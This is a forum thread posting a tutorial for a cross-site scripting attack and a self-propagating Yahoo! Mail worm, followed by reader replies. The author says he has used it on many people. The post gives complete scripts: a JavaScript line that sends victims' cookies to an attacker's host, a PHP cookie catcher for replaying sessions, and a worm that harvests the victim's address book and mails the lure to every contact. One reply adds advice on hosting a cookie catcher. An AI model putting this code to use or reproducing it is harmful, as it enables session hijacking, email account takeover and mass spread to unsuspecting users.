XSS Attack - Yahoo! Worm - Mail PoC

XXxxImmortalxxXX's Avatar author of XSS Attack - Yahoo! Worm - Mail PoC
This is an article on XSS Attack - Yahoo! Worm - Mail PoC in Ethical hacking Tips.
Hello guys here is another one of my tutorials ive used this on lots of ppl i would say this is a median-hard exploit

XSS Attack - Yahoo! Worm - Mail PoC



Disclaimer :
This is a PoC and it was created in educational purpose only. The author ( ME ) could not be held responsible if the PoC doesn't work or is used in different purpose's!

1. DESCRIPTION



Using Cross Site Scripting ( XSS ) attack's give's us the possiblity to impersone one legitim user ( victim ) that is a registered on a website ( target )

In this tutorial will suppose the target site has a XSS vulnerability which give's an attacker to inject a "bad code" into a page.

First, let's follow this step's :

a. The victim certify's on the target site
b. The attacker send's a link to a page ( with the "bad code" ) from the target site to the victim
c. The victim navigate's to the page
d. The page code load's a script from another location sending the victim's cookies
e. The script use's this cookie to act like the victim on target site

I'll illustrate now ( with example's ) :

We suppose the victim is allready certifyed on the target site

The target has a XSS vulnerability :
http://www.target.com/page.php?var=

The attacker send's the link to his victim :
"http://www.target.com/page.php?var="

When the victim follow's the link; the script "js.js" is loaded and executed by the browser

===== js.js =====
Code:
new Image().src='http://www.attacker.com/php.php?cookie= '+escape(document.cookie);
=================

The file "js.js" contain's a code which does a request to the file "php.php" - controled by the attacker.

===== php.php =====
Code:
$domain=".target.com"; // cookie domain 

$cookie=$_GET['cookie']; 

//we create the file , supposeing the cookie session has more sequence's "name=value; "

$hcook=fopen("cookie.txt","w"); 
$params=split('; ',$cookie); 
for($i=0; $i
{ 
	$eqpos=strpos($params[$i],"="); 
	$name =substr($params[$i],0,$eqpos); 
	$value=substr($params[$i],$eqpos+1,strlen($params[$i])); 
	fwrite($hcook,$domain. " TRUE / FALSE 9999999999 ".$name." ".$value." "); 
} 
fclose($hcook); 

// we make any curl request useing "cookie.txt" as CURLOPT_COOKIEFILE and CURLOPT_COOKIEJAR 

?>
The "php.php" file is esential to this kind of attack.

This steal's the victim's cookie and use's it to look like the victim on the target site. The reason for useing a php script in place of a javascript is to pass the javascript polics, haveing the possibility if requesting to anykind of domain where the cookie is valid. We can receive and send data to the target site and manipulate in any kind of mode.

2. YAHOO! MAIL Worm PoC



Will suppose that Yahoo! has a XSS vulnerability like the following form :

"http://xxx.yahoo.com/page?var="

a. The attacker send's an emails containing the link to http://xxx.yahoo.com/page?var= to the victim
b. The victim follow's the link ( Ok, pause. Let's name the victim BILL )
c. "worm.php" file is stealing BILL's cookie and useing it to send a mail to every person from his Address Book
d. The person's from BILL's Address Book become victim's when they follow the link from the email, which seeming to come from a victim

===== worm.php =====
Code:
$subject="Link for you"; // message subject
$message ="Look a cool link, CLICK ME!"; // message body

// We eliminate the need of a "js.js" file checking the parameter value of "cookie"
// If this doesn't exist we type the content of "js.js" file
// and if exist's we continue with "php.php" 

if(!isset($_GET['cookie'])) 
{ 
	$scripturl="http://".$HTTP_HOST.$REQUEST_URI; 
	print("new Image().src='".$scripturl."?cookie='+escape(document.cookie);"); 
} 
else 
{ 
	$cookie=$_GET['cookie']; 

	// We create a unique name for the file were we'll save the cookie ensureing this way
	// that when a lot of victim's access simultaneuously the script; the cookie's will not overwrite 
	$cookiefile=rand(100,999).".txt"; 


	// we create the cookie file

	$hcook=fopen($cookiefile,"w"); 
	$params=split('; ',$cookie); 
	for($i=0; $i
	{ 
		$eqpos=strpos($params[$i],"="); 
		$name =substr($params[$i],0,$eqpos); 
		$value= substr($params[$i],$eqpos+1,strlen($params[$i])); 
		fwrite($hcook,".yahoo.com TRUE / FALSE 9999999999 ".$name." ".$value." "); 
	} 
	fclose($hcook); 

	// We try the Yahoo! address book for data extraction all about the contact's and create a variable of the form 
	// "contact1@yahoo.com,contact2@yahoo.com, etc.." as well finding the domain us.fXXX.mail.yahoo.com
	// which change's each time there is a certify!


	$address=curl("http://address.mail.yahoo.com/","",$cookiefile); 
	if(strpos($address,"Yahoo! Address Book")==true) // if the page was loaded correctly
	{ 
		$apage=explode(" ",$address); 
		foreach($apage as $line_num => $aline) 
		{ 
			if(strstr($aline,"ymsgr:sendIM")) 
			{ 
				$ex =explode("?",$aline); 
				$ex2=explode(""",$ex[1]); 
				$id=$ex2[0]; 
				$to=$to.$ex2[0]."@yahoo.com,"; 
			} 
			if(strstr($aline,"Compose")) 
			{ 
				$ex3=explode("/",$aline); 
				$domain="http://".$ex3[2]; 
			} 
		} 
	} 

	// We load the "Compose" formular situaten on us.fXXX.mail.yahoo.com for finding the formular's action
	// to send email and parameter value ".crumb" which we need for sending message's


	if(strlen($to)>0 && strlen($domain)>0) // if we have the 2 variable's
	{ 
		$compose= curl($domain."/ym/Compose?","",$cookiefile); 
		if(strpos($compose,"Yahoo! Mail")==true) // if the page was loaded correctly
		{ 
			$cpage=explode(" ",$compose); 
			foreach($cpage as $line_num => $cline) 
			{ 
				if(strstr($cline,"form name="Compose"")) 
				{ 
					$ex4=explode(""",$cline); 
					$action=$ex4[5]; 
				} 
				if(strstr($cline,".crumb")) 
				{ 
					$ex6=explode(""",$cline); 
					$crumb=$ex6[3]; 
				} 
			} 
		} 

		if(strlen($action)>0 && strlen($crumb)>0) // if we have the 2 variable's 
		{ 

			$subject=str_replace(" ","+",$subject); 
			$message=str_replace(" ","+",$message); 

			// we generate POSTFIELDS for curl 

			$post ="SEND=1&SD=&SC=&CAN=&docCharset= iso-8859-1&PhotoMailUser=&PhotoToolInstall=&"; 
			$post.="OpenInsertPhoto=&PhotoGetStart= 0&SaveCopy=no&PhotoMailInstallOrigin=&"; 
			$post.="box=&.crumb=".$crumb."&"; 
			$post.="FwdFile=&FwdMsg=&FwdSubj=&FwdInline= &OriginalFrom=&OriginalSubject=&"; 
			$post.="InReplyTo=&NumAtt=0&AttData=&UplData= &OldAttData=&OldUplData=&FName=&"; 
			$post.="ATT=&VID=&Markers=&NextMarker= 0&Thumbnails=&PhotoMailWith=&BrowseState=&"; 
			$post.="PhotoIcon=&ToolbarState=&VirusReport= &Attachments=&BGRef=&BGDesc=&BGDef=&"; 
			$post.="BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom= &PlainMsg=&PhotoFrame=&PhotoPrintAtHomeLink=&"; 
			$post.="PhotoSlideShowLink=&PhotoPrintLink= &PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&"; 
			$post.="PhotoDownloadUrl=&PhotoSaveUrl= &PhotoFlags=&start=compose&bmdomain=&hidden=showcc&"; 
			$post.="showbcc=&AC_Done=&AC_ToList= &AC_CcList=&AC_BccList=&sendtop=Send&"; 
			$post.="savedrafttop=Save+as+a+Draft&canceltop= Cancel&To=".$to."&Cc=&Bcc=&"; 
			$post.="Subj=".$subject."&Body=".$message."&Format= html&SigAtt=1&sendbottom=Send&"; 
			$post.="savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&"; 

			// sending the mail's 
			$mail=curl($domain.$action,$post,$cookiefile); 
		} 
	} 
	unlink($cookiefile); 
} 

function curl($url,$post='',$cookiefile) // function to easy the curl request's
{ 
	$rand=rand(100000,400000); 
	$agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)"; 
	$ch=curl_init(); 
	curl_setopt($ch,CURLOPT_URL,$url); 
	curl_setopt($ch,CURLOPT_USERAGENT,$agent); 
	curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
	curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); 
	if($post!=='') 
	{ 
		curl_setopt($ch,CURLOPT_POST,1); 
		curl_setopt($ch,CURLOPT_POSTFIELDS,$post); 
	} 
	curl_setopt($ch,CURLOPT_COOKIEFILE,$cookiefile); 
	curl_setopt($ch,CURLOPT_COOKIEJAR,$cookiefile); 
	curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE); 
	$result=curl_exec($ch); 
	curl_close($ch); 
	if($result=="") { curl($url,$post); } else { return $result; } 
} 

?>
===================
Need help ask any question

The impact of this kind of worm can be huge!

Thank's for reading and hope you learned something

-XXxxImmortalxxXX
0
Safari's Avatar, Join Date: Oct 2007
Ambitious contributor
Can you please share what could be the impact because I am totally noob in this and it seems to be a bit interesting after your post
0
DeepSeas's Avatar, Join Date: Feb 2008
Go4Expert Member
yeah i am having a little trouble realizing the consequences as well. cool article, tho.
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
the best way is to upload a cookie catcher php file on some ftp server and receive the cookies directly there
0
pop3_zxcv's Avatar, Join Date: Nov 2008
Light Poster
XSS is normally used to capture session cookie of the active session of the victim browser. When this is done and successfully executed at victim machine. Victim browser gives out his active session cookie ( in this example yahoo email account cookie) to the attacker. Then attacker waiting for this session cookie will only have to replay it to his browser.
He can view all your email, delete or even send new mail from your email account. He wont be able to change your email account here because he dont know your password.